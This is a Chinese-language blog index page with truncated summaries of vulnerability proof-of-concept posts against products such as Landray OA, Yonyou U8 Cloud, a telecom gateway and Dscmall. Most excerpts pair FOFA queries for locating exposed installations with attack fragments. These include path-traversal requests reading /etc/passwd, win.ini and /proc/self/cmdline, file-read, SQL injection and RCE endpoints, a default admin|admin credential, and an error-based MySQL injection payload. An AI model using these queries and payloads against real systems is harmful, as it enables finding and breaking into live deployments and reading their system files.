摘要:
對國外某網站的SQL注入實戰 記錄一次某功能點遇到SQL注入漏洞嘗試丟到SQLMAP運行雖然成功,但是有些SQL注入類型存在但SQLMAP未識別出來,隨后便使用手工注入的方式獲得數據庫相關數據的隨筆 功能點 某網站存在URL如下的GET形公告展示點: /xxx/index.php?mod=detai 閱讀全文
posted @ 2025-01-30 18:35
NPC001
閱讀(158)
評論(0)
推薦(0)
摘要:
藍凌OA /sys/webservice/hrStaffWebService接口處存在任意文件讀取漏洞 FOFA app="Landray-OA系統" POC 文件讀取 POST /sys/webservice/hrStaffWebService HTTP/1.1 Host: Content-Typ 閱讀全文
posted @ 2024-11-07 10:29
NPC001
閱讀(1423)
評論(0)
推薦(0)
摘要:
FoFa body="k-login-layer" POC 只在日志里面翻到Linux版本的利用方式 /pub/tools/dowload_soft.jsp?fpath=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 閱讀全文
posted @ 2024-09-27 11:09
NPC001
閱讀(47)
評論(0)
推薦(0)
摘要:
FOFA body="移動管理平臺-企業管理" POC WindowsGET /client/cdnfile/1C/Windows/win.ini?windows LinuxGET /client/cdnfile/C/proc/self/cmdline?linux 閱讀全文
posted @ 2024-09-24 15:40
NPC001
閱讀(1049)
評論(0)
推薦(0)
摘要:
Dscmall電商商城wholesale_flow接口處存在SQL注入漏洞 FOFA語句 icon_hash="-164358497" SQL注入漏洞POST /wholesale_flow.php?step=ajax_update_cart HTTP/1.1 Host: User-Agent: M 閱讀全文
posted @ 2024-05-31 15:38
NPC001
閱讀(102)
評論(0)
推薦(0)
摘要:
電信網關配置管理系統漏洞 fofa語句: body="img/dl.gif" && title="系統登錄" 1.弱口令漏洞 弱口令: admin|admin 2.RCE漏洞 RCEPOST /manager/ipping.php HTTP/1.1 Host: Upgrade-Insecure-Re 閱讀全文
posted @ 2024-05-11 16:52
NPC001
閱讀(348)
評論(0)
推薦(0)
摘要:
用友U8 Cloud漏洞復現 1. Cloud smartweb2.RPC.d 存在XXE漏洞 漏洞描述 用友U8 Cloud smartweb2.RPC.d存在xml外部實體注入漏洞,攻擊者可以通過此漏洞讀取系統文件,獲取敏感信息等。 fofa語句: app="用友-U8-Cloud" 漏洞:PO 閱讀全文
posted @ 2024-05-11 16:10
NPC001
閱讀(330)
評論(0)
推薦(0)
摘要:
目錄vulntarget-k 復現準備的第三方工具與腳本環境配置復現攻擊機 kail → 跳板機 xxl-jobs Linux攻擊機 kail → 跳板機 xxl-jobs Linux → 成員機 nacos-spring Linux攻擊機 kail → 跳板機 xxl-jobs Linux → 成 閱讀全文
posted @ 2023-11-10 14:46
NPC001
閱讀(801)
評論(0)
推薦(0)
摘要:
exp()報錯注入 版本要求:5.5< mysql版本 <5.6 payloadand (exp(~(select * from (操作代碼) a))) 列子:SELECT * FROM db WHERE db='test' and (exp(~(select * from (SELECT VERS 閱讀全文
posted @ 2023-10-29 11:24
NPC001
閱讀(107)
評論(0)
推薦(0)
浙公網安備 33010602011771號